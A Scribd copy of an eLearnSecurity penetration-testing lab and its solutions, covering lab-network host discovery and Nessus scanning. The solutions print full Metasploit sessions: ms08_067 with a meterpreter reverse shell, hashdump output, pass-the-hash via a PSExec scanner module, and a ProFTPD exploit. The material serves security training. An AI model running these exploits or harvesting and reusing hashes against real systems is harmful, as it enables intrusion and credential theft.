Scribd
Upload
25 views10 pages

Lab 04.0 - VA & Exploitation

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
25 views10 pages

Lab 04.0 - VA & Exploitation

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

HERA

LAB ID: 4

VA & EXPLOITATION
Vulnerability Assessment
Multiplatform Remote Exploitation
[VA & Exploitation] LAB ID: 4

1. LAB
In this scenario your purpose is to get shell access to all machines in the
target network. To accomplish this you have to find vulnerabilities on
each machine, exploit them and run a shell. Note that some exploits need
information that you can gather from others machines.

All the machines to test are not NATed and exposed to the internet with
their IP address. (You can directly access them):

 NETBLOCK: 10.50.97.0/24

2. GOALS
 Find all hosts alive

 Find exploitable vulnerabilities on each host

 Detect services and OS’s

 Get a shell on each host

eLearnSecurity s.r.l. © 2012 | H E R A 2


[VA & Exploitation] LAB ID: 4

3. WHAT YOU WILL LEARN


 Vulnerability Assessment

 Exploitation

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of
different tools and different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired though the task you can achieve the Lab
goal.

If this is the first time you do this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of
this paper and check the solutions.

4. RECOMMENDED TOOLS
 Nessus

 Metasploit

eLearnSecurity s.r.l. © 2012 | H E R A 3


[VA & Exploitation] LAB ID: 4

5. TASKS
Task 1. Host Discovery and Vulnerability Assessment

Perform host discovery and then use a vulnerability scanner tool (such as
Nessus) to find if and which machines are vulnerable.

Task 2. Vulnerable targets

With the list of hosts and vulnerabilities, think how you can plan the
attack. There are different vulnerabilities that you can exploit, but some
of them require specific pre-requisites. Please note that the following
tasks will guide you through the exploitation process, but you have
different ways to achieve the same goal.

Task 3. Target 1 exploitation

You should now have a list of machines with their vulnerabilities. Set up
metasploit in order to exploit first the target, the machine 10.50.97.5.

Task 4. Get users and hashes

You should now have a meterpreter session on the target. Since we want
to exploit all other machines, we can dump password hashes in order to
crack them, or use them to exploit further targets.

eLearnSecurity s.r.l. © 2012 | H E R A 4


[VA & Exploitation] LAB ID: 4

Task 5. Exploitation: PSExec on the network

Now that we have a list of username and password hashes, we could try
to crack them or use PSExec exploit to get access to other machines. Since
we want to exploit all machines, we can use Carlos Perez Module ‘PSExec
Scanner’ that will try the exploit many machines at the same time.

Here you can find the link that explains how to add the module in
metasploit:
(http://pauldotcom.com/2011/12/psexec-scanner-module.html). Please
note that since the github URL provided in the guide doesn’t work
anymore, you have to manually edit psexec_scanner.rb in the
“.msf4/modules/auxiliary/scanner/smb/” folder, by simply coping in it the
script from this link:

https://github.com/darkoperator/Meterpreter-
Scripts/blob/master/auxiliary/scanner/smb/psexec_scanner.rb

Task 6. Target 3 exploitation

We should now have control of all target machines, besides one (Target
4). We know that there is only one service running on the target. We can
then try to detect the service version and check if it is vulnerable to
known exploits.

eLearnSecurity s.r.l. © 2012 | H E R A 5


[VA & Exploitation] LAB ID: 4

Solutions

eLearnSecurity s.r.l. © 2012 | H E R A 6


[VA & Exploitation] LAB ID: 4

Task 1. Vulnerability Assessment

In order to discover alive hosts, we can run Nmap with our preferred
settings:

>>nmap –sn 10.50.97.0/24


We will get the following alive hosts:

10.50.97.1
10.50.97.5
10.50.97.8
10.50.97.14
10.50.97.21

We can now set up Nessus in order to scan and find exploitable


vulnerabilities for each hosts found.

eLearnSecurity s.r.l. © 2012 | H E R A 7


[VA & Exploitation] LAB ID: 4

Task 2. Vulnerable targets

From the results of the Nessus scan we can conceive different attack
plans. Here is the one we will use in the next steps. Please note that you
might have followed a different approach and it’s perfectly fine.

Try to exploit target 10.50.97.5 with ms08_067

If it successes, dump password hashes

Use "PSExec scanner module" with dumped hashes

Exploit remaining machine depending on enabled services and vulnerabilities

Task 3. Exploitation: ms08_067

In the first task, we have discovered that the machine with IP 10.50.97.5
is vulnerable to ms08_067. We can start exploiting this machine by
setting metasploit as follows:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.50.97.5
RHOST => 10.50.97.5
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.5.42
LHOST => 172.16.5.41
msf exploit(ms08_067_netapi) > exploit

Note: running Nmap smb-check-vulns script or Nessus scan, after the


exploitation of the machine (with ms08_067_netapi module), could
cause the target service to crash!

eLearnSecurity s.r.l. © 2012 | H E R A 8


[VA & Exploitation] LAB ID: 4

Task 4. Get users and hashes

Since SMB is enabled on other machines, we can try to exploit them


through Pass the hash technique. Since we need a valid username and
password pair, once we have the meterpreter session on Target 1, we can
easily dump password hashes with the following command:
meterpreter > hashdump
Administrator:500:6df60586675b97c51f6252914a7633d7:fc5399dc481550f5442d15
85e10c0345:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089
c0:::
HelpAssistant:1000:485abeee55c20847527b7d40c923ce73:800a821fd8e8fd957fb7e
2142e4ec10a:::
netadmin:1003:a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfad
d88874:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0753109d18a2793366
6907e9069009c2:::

Task 5. Exploitation: PSExec on the network

Now that we have the password hashes, we can try to run PSExec on the
entire network and see if we are able to get access to further machines.
To do it let’s set up the psexec_scanner module this way:
msf auxiliary(psexec_scanner) > set LHOST 172.16.5.42
LHOST => 172.16.5.41
msf auxiliary(psexec_scanner) > set LPORT 4455
LPORT => 4455
msf auxiliary(psexec_scanner) > set RHOSTS 10.50.97.4-22
RHOSTS => 10.50.97.4-22
msf auxiliary(psexec_scanner) > set SMBUser netadmin
SMBUser => netadmin
msf auxiliary(psexec_scanner) > set SMBPass
a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874
SMBPass =>
a4fd0910b9418e67d342ec751ef6b28d:6757a9560a881a505b9fa7bfadd88874
msf auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10
msf auxiliary(psexec_scanner) > run

eLearnSecurity s.r.l. © 2012 | H E R A 9


[VA & Exploitation] LAB ID: 4

Note that the module is set up to perform the exploit using ‘netadmin’
username and the relative password hash.

Once you run the module, you should have two more meterpreter
sessions:
msf auxiliary(psexec_scanner) > sessions

Active sessions
===============

Id Type Information Connection


-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ELS-WIN03 172.16.5.42:4455 ->
10.50.97.8:1048 (10.50.97.8)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ELS-WINSER2003 172.16.5.42:4455 ->
10.50.97.14:1030 (10.50.97.14)

Task 6. Exploitation: ProFTPD

At this point we should have only one machine left un-exploited.

On Task 1 Nessus has detected an FTP Server on 10.50.97.21.

We can go deeper in research and run Nmap in order to see if we are able
to detect which software is running on each port. To do that we can use
the following command

>>nmap –sV 10.50.97.21


The tool tells us that the software version of the FTP service is ProFTPD
1.3.2a. If we make some researches, we can see that that version is
vulnerable to remote exploitation, and Metasploit already has a module
to exploit it, so let’s try to set it up and see if we are able to get a shell:
msf exploit(proftp_telnet_iac) > use
exploit/freebsd/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > set RHOST 10.50.97.21
RHOST => 10.50.97.21
msf exploit(proftp_telnet_iac) > exploit

After few retries, the exploit works, and we have a shell on the machine.
eLearnSecurity s.r.l. © 2012 | H E R A 10

You might also like